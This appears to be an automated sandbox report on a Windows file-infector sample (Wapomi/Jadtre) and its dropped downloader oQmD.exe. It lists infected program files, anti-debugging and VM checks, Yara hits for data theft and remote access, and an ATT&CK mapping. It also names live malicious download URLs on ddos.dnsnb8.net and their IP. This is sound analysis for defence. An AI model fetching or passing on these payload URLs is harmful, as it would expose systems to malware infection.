Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_2-1045
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-17246

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

API coverage: 2.2 %

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_00801718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00801754h

2_2_00801718

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_009685E9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_009685E9
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	Code function: 2_2_008029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		2_2_008029E2

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_00802B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00802B8C

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oQmD.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdWndClass
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: oQmD.exe, 00000002.00000002.1843788615.0000000000683000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000003.1638844737.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

API call chain: ExitProcess graph end node

graph_2-1020

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: 0_2_0095CC11 LdrInitializeThunk,InitializeCriticalSectionAndSpinCount,

0_2_0095CC11

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: 0_2_00958DFE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00958DFE

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_009FF044 mov eax, dword ptr fs:[00000030h]	0_2_009FF044
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_009605AA mov ecx, dword ptr fs:[00000030h]	0_2_009605AA
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00963E62 mov eax, dword ptr fs:[00000030h]	0_2_00963E62

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: 0_2_00969720 GetProcessHeap,

0_2_00969720

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00959015 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00959015
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00958DFE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00958DFE
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_0095CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0095CDE3
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: 0_2_00958F5A SetUnhandledExceptionFilter,	0_2_00958F5A

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: 0_2_00958BF5 cpuid

0_2_00958BF5

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetLocaleInfoW,	0_2_0096B99E
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0096BAC7
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetLocaleInfoW,	0_2_0096BBCD
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0096BC9C
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetLocaleInfoW,	0_2_00963C0B
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: EnumSystemLocalesW,	0_2_0096B5DA
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: EnumSystemLocalesW,	0_2_0096B6C0
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: EnumSystemLocalesW,	0_2_009636E5
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: EnumSystemLocalesW,	0_2_0096B625
Source: C:\Users\user\Desktop\1hdqYXYJkr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0096B74B

Source: C:\Users\user\Desktop\1hdqYXYJkr.exe

Code function: 0_2_00959212 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00959212

Source: C:\Users\user\AppData\Local\Temp\oQmD.exe

Code function: 2_2_0080139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0080139F

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: oQmD.exe PID: 6316, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: oQmD.exe PID: 6316, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1hdqYXYJkr.exe	85%	Virustotal		Browse
1hdqYXYJkr.exe	95%	ReversingLabs	Win32.Virus.Wapomi
1hdqYXYJkr.exe	100%	Avira	W32/Jadtre.B
1hdqYXYJkr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\oQmD.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oQmD.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oQmD.exe	96%	ReversingLabs	Win32.Trojan.Madeba
C:\Users\user\AppData\Local\Temp\oQmD.exe	93%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ddos.dnsnb8.net	13%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.raration	100%	Avira URL Cloud	phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rartS	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar$=	100%	Avira URL Cloud	malware
https://login.live.c	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarf=Q	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.raro	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rart	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarI	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rari	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rartS	16%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.raro	16%	Virustotal		Browse
http://ddos.dnsnb8.net/amData	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.raration	16%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rarAppData	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rart	11%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rarI	10%	Virustotal		Browse
http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll	14%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rari	12%	Virustotal		Browse
http://ddos.dnsnb8.net/amData	9%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.raration	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar$=	oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
